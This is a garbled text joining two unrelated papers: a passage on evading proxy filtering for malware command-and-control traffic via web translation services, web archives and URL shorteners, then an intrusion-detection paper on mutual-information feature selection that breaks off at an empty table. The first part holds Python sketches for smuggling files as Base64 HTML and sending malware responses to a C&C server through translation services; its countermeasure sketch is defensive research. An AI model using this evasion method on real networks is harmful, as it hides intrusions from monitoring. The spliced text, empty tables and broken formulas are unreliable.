Table 4. URLs when translated

Excite Translator:
http://www.excite-webtl.jp/world/english/web/?wb_url=http%3A%2F%2Fweb.dendai.ac.jp%2F&wb_lp=JAEN

Google Translate:
https://translate.google.co.jp/translate?hl=ja&sl=auto&tl=en&u=http%3A%2F%2Fweb.dendai.ac.jp%2F

However, in the cases of communication through
Google Translate, SDL, and the Internet Archive,
we found that information could be transmitted
successfully from the C&C server by filtering
avoidance even when URL filtering was
performed. As shown in Table 4, for Google
Translate and Excite Translator the target URL
to be translated is sent by the GET method, so
the C&C server's URL is included in the
translation URL. However, when Google
Translate and SDL communicate with the client,
the GET parameters are encrypted because the
communication is secured by https [15].
Therefore, we think that the filtering failed
because the proxy server could not inspect the
content of the GET parameter.
4.2 File reception method
Next, we investigated whether the transmission
of files from the C&C server is possible in our
environment. We consider two methods by which
the malware can retrieve files via the web
translation services:
A) In the web translation service, specify the
URL of the file directly to download it.
B) Get a page that contains a link to the file and
download the file from the link on the page.


For approaches (A) and (B), we examined
whether it is possible to download a file from a
server to which the connection is prohibited by
using the translation service. As a result, saving
the file failed for all translation services and all
types of filtering. The reasons why approaches
(A) and (B) failed are as follows. Approach (A)
failed because specifying the URL of a file whose
type cannot be translated (e.g., a type other than
html or php) returns an error, so the file cannot
be downloaded directly. Approach (B) failed
because a web translation service transmits the
translation of a targeted text page such as html
or php, whereas a file such as a jpg or exe is not
translated and remains on the original server.
From these results for (A) and (B), we found
that the only data transmittable via a web
translation service are the text data targeted for
translation, as shown in Figure 3.
translation text data, as shown in Figure 3.

Figure 3. Transmitted file formats

Thus, we consider that a file can be sent via a
web translation service, for filtering avoidance, if
it is embedded as text data into a file such as an
html file. As a method of embedding other files
into html, a technique exists that encodes an
image with Base64 and embeds it as a tag in an
html file. We confirmed that a Base64-encoded
image file can be downloaded with filtering
avoidance via the web translation service. In this
experiment, while the filtering was active, we
executed the download via the web translation
service both in the browser and in a program that
saves the file. The results are shown in
Table 5 for both the display of the image file on


the browser and the download by the program.


Table 5. Filtering avoidance results by service for the file reception
(cells indicate whether acquisition was successful or blocked)

Service            IP address   Domain   URL
Google
SDL
Other services:
Internet Archive
Web Fish Print

As in Section 4.1, a service that does not use
encrypted communication is clearly blocked by
URL filtering, but we found that the download
of a file embedded into html via the web
translation service avoided the other types of
filtering. By using the same technique to embed
malicious software into an html file and having
the malware store it, we think it is possible to
transmit an attack file from the C&C server. In
addition, the Internet Archive can deliver files
directly, because the files themselves are
archived; that is, acquisition through the Internet
Archive succeeded both by specifying the URL
of the file directly and by following a link. With
Web Fish Print, however, saving the file failed,
as with the web translation services, because
Web Fish Print does not archive binary files. In
the Internet Archive, file types such as jpg and
exe, and not only types such as html and php,
are saved in the archive on the server. Therefore,
when web archive services are used together with
malicious software, file transmission is also
possible in an environment in which filtering is
performed.
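The Base64 embedding technique mentioned above can be illustrated with the following sketch, in which a binary file is encoded into an html page (here as a data URI inside an img tag) so that it travels as translatable text and is decoded again on the receiving side; the tag layout and file names are assumptions for illustration, not the experimental program.

import base64

def embed_file_in_html(path):
    # Encode a binary file with Base64 and embed it as text inside an html page.
    with open(path, "rb") as f:
        encoded = base64.b64encode(f.read()).decode("ascii")
    return '<html><body><img src="data:image/jpeg;base64,%s"></body></html>' % encoded

def extract_file_from_html(html, out_path):
    # Recover the embedded binary file from the html text.
    encoded = html.split("base64,", 1)[1].split('"', 1)[0]
    with open(out_path, "wb") as f:
        f.write(base64.b64decode(encoded))

# Example round trip (file names are placeholders):
# page = embed_file_in_html("image.jpg")
# extract_file_from_html(page, "restored.jpg")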
4.3 Response transmission method
Finally, we investigated whether a response from
the malware is possible in our environment. In
targeted attacks, the malware must not only
receive commands from the C&C server but also
respond to it. We confirmed that it is possible to
reply via the web translation services. On the
other hand, we excluded the web archive services,
because an archive service does not access the
original page each time. In this

experiment, we set up a page that accepts the
GET and POST methods on the web server, and
we applied domain filtering to that web server.
From our implemented program, we sent a write
request to this page via the web translation
services and investigated whether the data were
written. Following Section 4.1, the filtering
formats used were domain filtering and URL
filtering, for translation services with and without
encrypted communication. In the results of the
experiment, for all of the web translation services,
writing with the GET method succeeded in
avoiding the filtering, whereas writing with the
POST method failed.

Figure 4. Methods available for Google Translate

As shown in Figure 4, in the GET method the
data are included in the URL part of the http
request, and this part reaches the original server
being translated. On the other hand, in the POST
method the data are included in the http header
and body and do not appear in the URL, so we
think that the information is lost when the request
is sent to the translation service. From this result,
the response from the malware to the C&C server
has to be sent by using the GET method.
However, the GET method has disadvantages:
the amount of data that can be transmitted is
limited, and the content of the response is
recorded in the proxy server's URL log.
4.4 Result Summary
From the results of the experiments in Sections 4.1-4.3, we found that receiving a command, receiving a file, and sending a response to the C&C server are all possible via the web translation service. Therefore, we think that the filtering avoidance method using web translation services can be applied for the communication of a targeted


attack. Furthermore, for all of the web


translation services, it is possible to detect and block the communication of a targeted attack, because the URL of the targeted web page is sent as a GET parameter and URL filtering therefore cannot be avoided. However, web services with encrypted communication, such as Google Translate, SDL, and Internet Archive, encrypt the content they send, so in addition to URL filtering, a countermeasure that decrypts the encrypted data before filtering is needed.
5 Experiments using a URL shortener service

5.1 Purpose
As described in the related research [4], using a URL shortener is effective for avoiding filtering with web translation services. A URL shortener generates a short URL that points to a targeted URL. When the shortened URL is accessed, the user is redirected to the web page of the unshortened full URL. By using a URL shortener, the URL of the C&C server is shortened, and the shortened URL is then accessed from the web translation service to avoid filtering. We conducted an experiment to investigate whether filtering avoidance combined with a URL shortener can be applied for a targeted attack. In this experiment, we used bit.ly [16] as the URL shortener.
5.2 Command transmitting method
We confirmed that the transmission of a command is possible in a filtered environment when a URL shortener is combined with a web translation service. In this experiment, we created a shortened URL for the filtering target and then accessed the shortened URL via a web translation service from a web browser. We found that filtering avoidance was possible.
Table 6. Filtering avoidance results by translation service with a URL shortener
(Services: Google Translate, Excite Translator, Yahoo! translation, Infoseek translation, So-net translation, WorldLingo, SDL; filtering types: Normal, IP address, Domain, URL; cell legend: acquisition successful / blocked)

Compared with the result without the URL shortener, we found that URL filtering can be avoided even for services without encryption when a URL shortener is used. We think that the URL shortener hides the targeted domain and avoids detection, because the URL is sent to the web translation service in the form of a shortened URL. However, in the case of WorldLingo, the filtering avoidance failed. From these results, we think that even when URL filtering is applied to a web translation service, it is possible to avoid it by combining a URL shortener with the web translation service.
5.3 File transmission method
For the combination of a URL shortener and a web translation service, we confirmed that it is possible to send a file. As in the Section 5.2 experiment, we executed the following three methods: specifying the URL of a file directly, downloading a file from a link, and embedding a file into HTML and sending it. As in the experiment with the web translation service only, the transmission of the file was successful only for the method of embedding the file. Furthermore, as in Section 5.2, filtering avoidance using a web translation service without encryption was successful.
5.4 Response method
With the combination of a URL shortener and a web translation service, we confirmed that it is possible to respond to the C&C server in a filtered environment. From the results in Section 5.3, we think that a URL carrying the response in a GET parameter must be sent via the web translation service for the response to reach the C&C server. Therefore, to transmit a response by using a URL shortener, a URL is sent to the URL shortener for every response and, after the shortening is executed, the shortened URL is sent to the web translation service, as sketched below.
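A rough sketch of this shorten-then-translate flow, with shorten() standing in for whatever URL shortener API is used (the real bit.ly call requires an authenticated request, which is omitted here) and the same placeholder translation endpoint as before:

    import urllib.parse
    import urllib.request

    def shorten(long_url):
        # Placeholder for a URL shortener API call (e.g., bit.ly); it should
        # return a short URL that redirects to long_url.
        raise NotImplementedError("call the shortener service here")

    def respond_via_shortener(c2_url, data, translate_endpoint):
        # 1. Put the response data into the GET query string of the C&C URL.
        target = c2_url + "?" + urllib.parse.urlencode({"r": data})
        # 2. Shorten it, so the C&C domain no longer appears in the request.
        short_url = shorten(target)
        # 3. Access the shortened URL through the translation service.
        wrapped = translate_endpoint + "?" + urllib.parse.urlencode({"u": short_url})
        with urllib.request.urlopen(wrapped) as resp:
            return resp.status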


From the experiment, we found that this


approach was successful for responding to the C&C server for all translation services except WorldLingo. We think that the reason for the failure with WorldLingo is that it can still be filtered even when a URL shortener is used, as shown by the result in Section 5.2.
5.5 Result Summary
From the results of the experiments in Sections 5.2-5.4, we found that the technique combining a URL shortener and a web translation service makes transmission of a command, transmission of a file, and replying to the C&C server possible. Therefore, we think that the method with a URL shortener can be applied to the communication of a targeted attack. When the filtering avoidance method is combined with a URL shortener, it is possible to avoid the URL filtering that was an effective countermeasure when only a web translation service is used, and thus to carry out the communication of the targeted attack. However, the combination with the URL shortener has a load disadvantage, because the URL must be shortened for every response to the C&C server.
6. Countermeasures

From the Section 4 results, we found that URL filtering is effective against the avoidance method that uses a web translation service without encrypted communication. Some translation services with encrypted communication, such as Google Translate and SDL, require URL filtering together with an encryption countermeasure for decoding on a proxy server. As a countermeasure for encrypted communication, we need filtering software [17][18] that calls an https decoding function [19], which stores a proxy server certificate at the terminal and then decodes the encrypted communication by using this certificate. For web archive services, it is possible to combine the countermeasure for encrypted communication with URL filtering. For the filtering avoidance method with a URL shortener, we found that URL filtering cannot be used against it, as shown by the result in Section 5.


However, a countermeasure with content filtering is possible against the use of a URL shortener, because malware cannot generate a shortened URL unless it sends the original URL to the URL shortener. When content filtering is executed, the countermeasure for encrypted communication is also needed, because many URL shortener services use encrypted communication. Furthermore, we think that a countermeasure could prohibit communication with the translation service or the URL shortener from the perspective of operation and management. These countermeasures have the advantage that they can be realized only by filtering settings, but the disadvantage of inconvenience for users. These measures are shown in Table 7.
Table 7. Countermeasure ranges and approaches
(Countermeasures: 1. URL filtering; 2. https decode; 3. Content filtering; 4. Ban URL shorteners; 5. Ban https use in translation services; 6. Ban translation services. Ranges: translation services, https, URL shorteners.)

Countermeasures 1, 2, and 3 in the table are technical countermeasures that can solve the problems. However, they need more sophisticated and higher-function filtering software, so the increased cost and the processing burden have to be considered. Countermeasures 4, 5, and 6 in the table are countermeasures from the perspective of operation and management, and they increase the burden of inconvenience for users. By combining these countermeasures in accordance with the organization's environment, it is possible to counter the attack method of filtering avoidance with a web translation service.
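As a rough sketch of countermeasures 1 and 3, a proxy-side filter could check the requested host against a blocklist and, for requests to known translation services or URL shorteners, also inspect the URL carried in the parameters or body. The host names and blocklist below are hypothetical, and the sketch assumes the proxy already sees the decrypted request (i.e., countermeasure 2 is in place).

    from urllib.parse import urlparse, parse_qs

    BLOCKED_DOMAINS = {"c2.example.com"}                                # hypothetical blocklist
    WRAPPING_SERVICES = {"translate.example.com", "short.example.com"}  # placeholder hosts

    def is_blocked(request_url, request_body=""):
        parsed = urlparse(request_url)
        # Countermeasure 1: plain URL filtering on the requested host.
        if parsed.hostname in BLOCKED_DOMAINS:
            return True
        # Countermeasure 3: content filtering for translation services and
        # URL shorteners - look for a blocked target URL inside the request.
        if parsed.hostname in WRAPPING_SERVICES:
            values = [v for vals in parse_qs(parsed.query).values() for v in vals]
            values.append(request_body)
            for value in values:
                if urlparse(value).hostname in BLOCKED_DOMAINS:
                    return True
        return False

    # is_blocked("https://translate.example.com/?u=http://c2.example.com/cmd")  # -> True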



7. Conclusion

In this paper, we confirmed that an attacker who communicates with a C&C server for a targeted attack can perform the attack and avoid filtering by using web translation services. In addition, we showed that a method combining them with a URL shortener is another approach for a targeted attack. As a countermeasure, we found that applying URL filtering is effective against a web translation service without encrypted communication. In addition, a countermeasure that filters the encrypted communication of a web translation service is effective. For the combination of a URL shortener and a web translation service, we also confirmed that content filtering is an effective countermeasure technique. Furthermore, we showed a countermeasure from the perspective of operation and management that prohibits communication with services that can be used for filtering avoidance. In future work, we will address the cost of the countermeasures, their performance and user convenience, and we will discuss the best solution for each organization.

References
[1] Ryoichi Sasaki, Tetsutaro Uehara, & Takashi Matsumoto. (2013). Present Status and Future Direction Network Forensics against Targeted Attack. Computer Security Symposium, 2013(4), 155-162.
[2] Masahiro Yamada, Masanobu Morinaga, Yuki Unno, Satoru Toru, & Masahiko Takenaka. (2013). A Detection Method against Activities of Targeted Attack on The Internal Network. IPSJ SIG Technical Report, 1-6.
[3] Hoffman, B. (2008). JavaScript Malware for a Gray Goo Tomorrow.
[4] Spammers disguise links using Google translate, https://barracudalabs.com/2013/03/spammers-disguise-links-using-google-translate/, (access 2015-11).
[5] Google Translate, https://translate.google.co.jp/, (access 2016-04).
[6] Bing Translator, https://www.bing.com/translator, (access 2016-04).
[7] Excite Translator, http://www.excite.co.jp/world/, (access 2016-04).
[8] Yahoo! Translate, http://honyaku.yahoo.co.jp/, (access 2015-11).
[9] Infoseek multi Translate, http://translation.infoseek.ne.jp/web.html, (access 2015-11).
[10] Translate | So-net, http://www.so-net.ne.jp/translation/, (access 2015-11).
[11] WorldLingo, http://www.worldlingo.com/ja/products_services/worldlingo_translator.html, (access 2015-11).
[12] SDL FreeTranslation, https://www.freetranslation.com/ja/, (access 2015-11).
[13] Internet Archive: Digital Library of Free Books, Movies, Music & Wayback Machine, https://archive.org/index.php, (access 2015-11).
[14] Web Fish Print, http://megalodon.jp/, (access 2015-11).
[15] D. G. J. D. Shorter, Effectiveness of Internet Content Filtering, Journal of Information Technology Impact.
[16] Bitly | URL Shortener and Link Management Platform, https://bitly.com/, (access 2016-04).
[17] i-FILTER SSL Adapter, i-FILTER, http://www.daj.jp/bs/i-filter/old/option_relation_ssl_adapter, (access 2015-11).
[18] Counter SSL Proxy, http://www.swatbrains.co.jp/csp.html, (access 2015-11).
[19] E. Akba, Next generation filtering: Offline filtering enhanced proxy architecture for web content filtering, ICIS, 2008.


Using Mutual Information for Feature Selection in a Network Intrusion Detection System
Mohammed A. Ambusaidi
Colleges of Applied Sciences, Nizwa, Oman
Email: mohamed [email protected]
ABSTRACT
This paper presents the feature selection problem
for data classification arising from a large number of redundant and irrelevant features. It first
proposes a Mutual-Information-based Feature Selection Algorithm, MIFSA in short, that analytically selects the best features for classification. The
key contribution is the use of mutual information,
which can handle linearly and non-linearly dependent data features. Its effectiveness is evaluated in
cases of network intrusion detection. An Intrusion
Detection System (IDS) is built using the features selected by our proposed feature selection algorithm; the resulting system is named IDS+MIFSA. To verify the feasibility
of IDS+MIFSA, several experiments are conducted
on three well-known intrusion detection datasets:
KDD Cup 99, NSL-KDD and Kyoto 2006+ dataset.
The experimental results show that our method performs better than other algorithms in most cases in
terms of classification accuracy.

KEYWORDS
Feature selection, Mutual information, Intrusion
detection system

1 INTRODUCTION

Feature selection is a technique for eliminating irrelevant and redundant features and selecting the optimal subset of features that produces a better characterisation of patterns belonging to different classes. The feature selection problem has been around since the early
1970s. Due to its computational complexity, it
remains an open area for researchers. Feature
selection reduces computational cost, facilitates data understanding, improves the performance of modelling and prediction and speeds
up the detection process of IDS [1].
A feature is relevant to the class if it contains


important information about the class; otherwise it is irrelevant or redundant. Since mutual
information is good at quantifying the amount
of information shared by two random variables, it is often used as an evaluation criterion
to evaluate the relevance between features and
class labels.
Several feature selection algorithms, including those in [2, 3, 4, 5, 6, 7, 8], have been proposed in the literature based on the principle of mutual information. Battiti's MIFS [2] is one of the earliest methods that evaluate features based on their relevance to classification. Numerous studies, including [3] to [8], have been conducted to improve Battiti's MIFS. A clearer and more detailed explanation of these methods and their limitations is given in Section 2.
The key contributions of this paper are as follows.
1. This work proposes a new feature selection algorithm in which mutual information is introduced to evaluate the
dependence between features and output
classes. The most relevant features are retained and used to construct classifiers for
their respective classes. This method is an
enhancement of Mutual Information Feature Selection (MIFS) [2] and Modified
Mutual Information-based Feature Selection (MMIFS) [7].
2. After tackling feature selection, the selected features are then used to train the classifier and build an IDS.
3. We conduct complete experiments on
three well-known IDS datasets. This is
very important in evaluating the performance of IDS since these datasets contain most recent and novel attack patterns. In addition, these datasets are fre-


quently used in the literature to evaluate


the performance of IDS. Moreover, these
datasets have various sample sizes and
different numbers of features, so they provide many more challenges for comprehensively testing feature selection algorithms.
The rest of this paper is organized as follows. Section
2 briefly reviews the concept of mutual information and works that are related to this study.
Section 3 introduces the proposed feature selection algorithm MIFSA. Section 4 details our
detection framework showing different detection stages involved in the proposed scheme.
Section 5 presents the experimental details and
results. Finally, we draw a conclusion and discuss our future work in Section 6.
2 BACKGROUND TO MUTUAL INFORMATION

The key concept of mutual information comes


from information theory which was proposed
in 1948 by Shannon [9]. It describes the
amount of information shared between two
random variables. It is a symmetric measure of
the relationship between two random variables,
and it yields a non-negative value [10]. A zero
value of MI indicates that the two observed
variables are statistically independent. Given
two random variables X = {x1 , x2 , ..., xn }
and Y = {y1 , y2 , ..., yn }, where n is the total
number of samples, the mutual information between variables X and Y is defined as:

I(X; Y) = H(X) + H(Y) - H(X, Y)    (1)


where H(X) and H(Y) are the uncertainties of X and Y, and H(X, Y) is the joint entropy of X and Y.
To quantify the amount of knowledge on variable X provided by variable Y (and vice versa),
mutual information can be defined as follows.

I(X; Y ) =

XX
xX yY

p(x, y) log

p(x, y)
. (2)
p(x)p(y)


where p(x, y) is the joint probability density


function of X and Y . From Eq. (2), a
high value of I(X; Y ) indicates both X and Y
are closely related; otherwise, a zero value of
I(X; Y ) means both X and Y are independent.
As stated above, a feature is relevant to the
class if it contains important information about
the class; otherwise it is irrelevant. Since
mutual information is good at quantifying the
amount of information shared between two
random variables, it is often used to determine
the relevance between features and the output
class. In this context, features with high predictive power are those that have larger mutual
information I(C; f). On the contrary, when I(C; f) equals zero, the feature f and the class C are independent of each other, which suggests that feature f carries no useful information about the class.
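As a simple illustration, the following Python sketch estimates I(C; f) for a discrete feature by plugging empirical probabilities into Eq. (2); continuous features would have to be discretized first, and this plug-in estimator is only one possible choice.

    import numpy as np

    def mutual_information(x, y):
        # Plug-in estimate of I(X; Y) (Eq. 2) for two discrete variables.
        x, y = np.asarray(x), np.asarray(y)
        mi = 0.0
        for xv in np.unique(x):
            p_x = np.mean(x == xv)                      # marginal p(x)
            for yv in np.unique(y):
                p_xy = np.mean((x == xv) & (y == yv))   # joint p(x, y)
                if p_xy > 0:
                    p_y = np.mean(y == yv)              # marginal p(y)
                    mi += p_xy * np.log(p_xy / (p_x * p_y))
        return mi

    # Relevance of a feature to the class label:
    # relevance = mutual_information(feature_column, class_labels)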
Recently, mutual information has been used by a number of researchers to develop supervised feature selection methods [2, 3, 4, 5, 6, 7, 8]. Battiti in [2] harnessed MI between inputs and outputs for the selection of individual features by calculating I(C; fi) and I(fs; fi), where fi is a candidate feature, fs is an already-selected feature, and C is the class label. MIFS selects the feature that maximizes I(C; fi), which is the amount of information that feature fi carries about the class C, corrected by subtracting a quantity proportional to the MI with the features selected previously. MIFS is a heuristic incremental search algorithm, and the selection process continues until the desired number R of inputs is selected.
Eq. (3) shows the evaluation function of MIFS:

I(C; fi) - β Σ_{fs∈S} I(fi; fs)    (3)

where β is a user-defined parameter that is applied to regulate the relative significance of the redundancy between the current feature and the set of previously selected features.
As can be seen, Eq. (3) consists of two terms.
The left-hand side term, I(C; fi ), represents
the amount of information that feature fi carries about the class C. A relevant feature is the
one that maximizes this term. The right-hand


side term, Σ_{fs∈S} I(fs; fi), is used to eliminate the redundancy among the selected features.
In follow-up research, various methods have been proposed to enhance Battiti's MIFS. Most of the studies have been conducted on the right-hand side term of Eq. (3). Kwak and Choi in [3] made a better estimation of MI between input features and output classes and proposed a greedy selection algorithm named MIFS-U, in which U stands for uniform information distribution. MIFS-U shows a better estimation of I(C; fi) than MIFS. The algorithm of MIFS-U differs from that of MIFS in the right-hand side
term, as shown in Eq. (4):

I(C; fi) - β Σ_{fs∈S} ( I(C; fs) / H(fs) ) I(fi; fs)    (4)

Despite the redundancy parameter β used in the aforementioned methods to help control the redundancy among features, it remains an open question how to choose the most appropriate values for these parameters. If the chosen value is too small, the redundancy between input features is not taken into consideration, and therefore both relevant and redundant features are involved in the selection process. If the chosen value is too large, the algorithms only consider the relation between input features rather than the relation between each input feature and the class [6]. Thus, it is hard to determine the value of the parameter. In addition, both MIFS and MIFS-U neglect the influence of the number of selected features. This reduces the influence of I(C; fi) in Battiti's MIFS and Kwak's MIFS-U when the term on the right-hand side in both methods increases, because this term is a cumulative sum [5]. This results in irrelevant features being selected into the set S.
These limitations have been studied by Amiri in [7], and a modified version of MIFS (MMIFS) was proposed. MMIFS sets the value of the parameter β′ to be equal to β/|S|, where β is the redundancy parameter, as shown in Eq. (5):

I(C; fi) - (β/|S|) Σ_{fs∈S} I(fi; fs)    (5)

where |S| is the cardinality of the set S, which is used to control the influence of the number of selected features, since the right-hand side of the algorithm is a cumulative sum. However, in the case of β′ = β/|S|, MMIFS is equal to Battiti's MIFS. Therefore, the unbalance between the left-hand and right-hand sides in Eq. (5) remains totally unsolved in MMIFS [7]. This might result in selecting irrelevant features. In addition, similar to Battiti's MIFS and Kwak's MIFS-U, selecting an appropriate value for the parameter β′ in MMIFS remains an open question.
3 PROPOSED FEATURE-SELECTION-BASED MUTUAL INFORMATION
As discussed above, there is no specific way to select the best value for the parameter β, as it is required in Battiti's MIFS, Kwak's MIFS-U and Amiri's MMIFS. Therefore, in this paper we propose a new variation of MIFS. This method eliminates the burden of selecting an appropriate value for β and keeps the values of the right-hand side of our evaluation function within the range of [0,1].
Given a feature set F = {f1, f2, ..., fn}, where n is the total number of features, the task is to select the best subset of features G = {g1, g2, ..., g|G|}, where |G| is the number of selected features. Eq. (6) shows the proposed feature selection criterion, which is intended to iteratively select a feature from an initial input feature set that maximizes I(C; fi) and minimizes the average redundancy simultaneously. On the right-hand side of Eq. (6), NMI(fi; G), which is presented in Eq. (7), normalizes the value of MI between the candidate feature fi in F \ {g1, g2, ..., gm-1} and the set of previously selected features {g1, g2, ..., gm-1}, based on the entropies of the features in F \ {g1, g2, ..., gm-1}, in order to select the m-th feature, gm, from F \ {g1, g2, ..., gm-1}.

gm = argmax_{fi} ( I(C; fi) - NMI(fi; G) )    (6)

where I(C; fi) is the amount of information that feature fi carries about the class C, i ∈ {1, 2, ..., n}, and n is the total number of features in F.

NMI(fi; G) = (1/|G|) Σ_{j=1}^{m-1} I(fi; gj) / H(fi)    (7)

where j ∈ {1, 2, ..., |G|} and |G| is the cardinality of set G.


Therefore, the overall procedure of the proposed feature selection algorithm is as follows.
Algorithm 1 Overall procedure of the proposed MIFSA
Input: Feature set F = {fi, i = 1, ..., n}; R: the number of selected features, R ≤ n.
Output: G - the selected feature subset
1. Initialization: set G = ∅
2. Calculate I(C; fi) (i = 1, ..., n) for each feature in F.
3. Select the feature fi that maximizes I(C; fi). Set F ← F \ {fi}; G ← G ∪ {fi}.
4. while |G| < R do
       for each feature fi ∈ F do
           Calculate NMI(fi; G) in Eq. (7) for all pairs of (fi; G).
       end
       Using Eq. (6), select gm.
       Set F ← F \ {gm}; G ← G ∪ {gm}.
   end
return G
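For concreteness, the sketch below implements Algorithm 1 in Python on top of the mutual_information helper sketched in Section 2. It assumes discrete (or already discretized) feature columns stored in a numpy array; the estimators and variable names are ours, not the authors' implementation.

    import numpy as np

    def entropy(x):
        # Plug-in entropy estimate H(X) of a discrete variable.
        _, counts = np.unique(x, return_counts=True)
        p = counts / counts.sum()
        return float(-np.sum(p * np.log(p)))

    def nmi(fi, selected_cols):
        # Eq. (7): average of I(fi; gj) / H(fi) over the already-selected features.
        h = entropy(fi)
        if not selected_cols or h == 0:
            return 0.0
        return sum(mutual_information(fi, g) for g in selected_cols) / (len(selected_cols) * h)

    def mifsa(X, C, R):
        # X: samples x features array, C: class labels, R: number of features to keep.
        X = np.asarray(X)
        remaining = list(range(X.shape[1]))
        relevance = {i: mutual_information(X[:, i], C) for i in remaining}
        best = max(remaining, key=relevance.get)       # step 3: most relevant feature first
        selected = [best]
        remaining.remove(best)
        while len(selected) < R and remaining:         # step 4: greedy selection by Eq. (6)
            cols = [X[:, j] for j in selected]
            best = max(remaining, key=lambda i: relevance[i] - nmi(X[:, i], cols))
            selected.append(best)
            remaining.remove(best)
        return selected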
4 INTRUSION DETECTION FRAMEWORK BASED ON FEATURE SELECTION

The proposed intrusion detection system is depicted in Figure 1. It comprises four main
stages: (1) data collection, where a sequence of
network packets is collected; (2) data preprocessing, where training and test data are preprocessed and important features that can distinguish one class from another are selected;
(3) classifier training, where the model for classification is trained; and (4) attack recognition,
where the trained classifier is used to detect intrusions on the test data. One can find more
details about these stages in [11].


4.1 Data Collection
This is the first and most important stage of intrusion detection, where a sequence of network packets is collected.
4.2 Data Pre-processing

In this stage, the obtained training and test


data from the data collection stage are first
pre-processed to generate basic features. This
phase involves three main steps. The first step
is data transferring, in which every symbolic
feature in a dataset is first converted into a numerical value. The second step is data normalisation, in which each feature in the data is
scaled into a well-proportioned range to eliminate the bias in favour of features with greater
values from the dataset. The third step is feature selection, in which the proposed MIFSA
is used to nominate the most important features that are then used to train the classifier
and build our detection model.
4.3 Classifier Training

In this stage, the classifier is trained. Once the


best subset of features is selected, this subset
is then passed into the classifier training stage
where a specific classification method is employed.
4.4 Attack Recognition

In this stage, the trained model is used to detect


intrusions on the test data. After completing all
the iteration steps and training the final classifier which includes the most correlated and important features, the normal and intrusion traffic can be recognised by using the saved trained
classifier. The test data is then taken through
the trained model to detect attacks.
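A minimal end-to-end sketch of these four stages, reusing the mifsa selector sketched above; the classifier here is a scikit-learn SVC used purely as a placeholder, since this section does not fix a particular classification method, and in practice the feature columns would be discretized for the MI estimates.

    import numpy as np
    from sklearn.svm import SVC

    def run_ids(X_train, y_train, X_test, R=16):
        X_train = np.asarray(X_train, dtype=float)
        X_test = np.asarray(X_test, dtype=float)
        # Stage 2: pre-processing - scale every feature by its maximum value,
        # then keep the R most informative features selected by MIFSA.
        col_max = X_train.max(axis=0)
        col_max[col_max == 0] = 1.0
        X_train, X_test = X_train / col_max, X_test / col_max
        selected = mifsa(X_train, y_train, R)    # MIFSA sketch from Section 3
        # Stage 3: classifier training on the selected features only.
        clf = SVC()                              # placeholder classifier
        clf.fit(X_train[:, selected], y_train)
        # Stage 4: attack recognition on the test data.
        return clf.predict(X_test[:, selected])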
5 EXPERIMENTS AND RESULTS
5.1 Benchmark Datasets

To validate performance fairly, three wellknown benchmark datasets are adopted in our
experiments. These three datasets are KDD
Cup 99 datasets [12], NSL-KDD datasets [13]
and Kyoto 2006+ datasets [14]. All of these


Figure 1. The framework of the proposed IDS based on MIFSA

datasets are freely accessible. They are frequently used in the literature to assess the
performance of feature selection algorithms.
In addition, these datasets have various types,
sample sizes and different numbers of features which can provide comprehensive tests
in validating feature selection methods. As
our scheme is also studying feature behaviour,
these datasets can be used to demonstrate the
validity and novelty of our algorithm. Table 1
summarizes some general description information about these datasets.

lected from both honeypots and regular servers


that are deployed at Kyoto University. Each
connection in this dataset is unique and has
23 features. For the experiments on the Kyoto
dataset, samples that form the data of the days
2009 August 27, 28, 29, 30 and 31 are selected
and they contain the latest updated data.
For experimental purposes, 1000 samples from
each dataset are randomly selected. Half of the
samples are used as training data and the other
half is used as testing data.
Table 1. General information and summary of datasets used in the experiments.
Dataset         Feature   Class   Training   Testing
KDD Cup 99      41        5       500        500
NSL-KDD         41        5       500        500
Kyoto 2006+     23        2       500        500

The KDD Cup 99 dataset is one of the most


popular intrusion detection datasets and is
widely applied to evaluate the performance of
intrusion detection systems [15]. It consists of
five different classes: normal and four types
of attack (i.e., DoS, Probe, U2R and R2L).
The NSL-KDD is a new revised version of the
KDD Cup 99 that has been proposed by Tavallaee et al. in [13]. This dataset addresses
some problems included in the KDD Cup 99
dataset such as the huge number of redundant
records in KDD Cup 99 data. Similar to the
KDD Cup 99 dataset, each record in the NSL-KDD dataset has 41 different quantitative and
qualitative features. The Kyoto 2006+ dataset
was presented by Song et al. [14]. The dataset
covers over three years of real traffic data col-


5.2 Experimental Setup

During the experiments, the value of R which


represents the number of desired features in
Algorithm 1 is given by the user in advance.
To achieve impartial results and decrease the
random selection effect, all of the experimental
results presented in this paper are the averages
of 10 independent runs.
To avoid the bias in favor of features with
greater values in all datasets, every feature
within each record is normalized by the respective maximum value and falls into the same
range of [0,1].
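A one-function sketch of this normalization step, assuming the records are held in a numpy array and the column-wise maxima are taken from the data being scaled:

    import numpy as np

    def max_normalize(X):
        # Scale every feature (column) by its maximum value so that it falls in [0, 1].
        X = np.asarray(X, dtype=float)
        col_max = X.max(axis=0)
        col_max[col_max == 0] = 1.0   # leave all-zero columns unchanged
        return X / col_max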
5.3 Results and Discussion

In order to prove the performance of our IDS + MIFSA, we conducted many experiments to compare it with other state-of-the-art approaches. We
divided the KDD Cup 99 into five different
classes and more experiments were conducted
on DoS, Probe, U2R and R2L attacks. Tables
2, 3 and 4 depict the comparison results based
on KDD Cup test, NSL-KDDTrain+ and Kyoto 2006+ datasets respectively. The results il-


lustrated in these tables strongly indicate that


our detection model shows promising results in
comparison with other models.
Figure 2 illustrates a comparison of the proposed IDS+MIFSA with the systems proposed
in [16, 17, 18] and [19] that have been tested
on the KDD Cup 99 in terms of the classification accuracy. Among those IDSs the proposed
IDS enjoyed the best classification accuracy.
Table 2 shows the accuracy percentage
achieved by different detection models for the
various attack classes on KDD Cup 99 dataset.
Regarding the results obtained by other authors, it can be seen that the proposed approach
achieves the best accuracy among all models
and in all classes.

Figure 2. Comparison results of classification accuracy on KDD Cup 99 dataset

Table 2. Comparison results in terms of accuracy rate with other IDSs based on the KDD Cup 99 dataset
System            DoS     Probe   U2R     R2L
IDS + MIFSA       99.89   99.93   99.97   99.93
SVM + PBR [16]    99.22   99.38   99.87   99.78
SVM [17]          99.25   99.70   99.87   99.78
Bayesian [18]     98.95   99.57   48.00   98.93
FNT [19]          98.75   98.39   99.70   99.09
Radial SVM [20]   98.94   97.11   97.80   97.78

Figure 3 plots the classification accuracies achieved by different detection models that have been tested on the NSL-KDD dataset. The results in the figure show that the performance of IDS + MIFSA is better than that of the other detection systems.

Figure 3. Comparison results of classification accuracy on NSL-KDD dataset

Table 3 demonstrates the results achieved by our proposed IDS compared with the approaches tested on the NSL-KDDTrain+ dataset in terms of detection rate and false-positive rate. It is clear that our approach achieves the best results, at a 99.15% detection rate and a 0.81% false positive rate.

Table 3. Comparison results based on NSL-KDD dataset (n/a means no available results.)
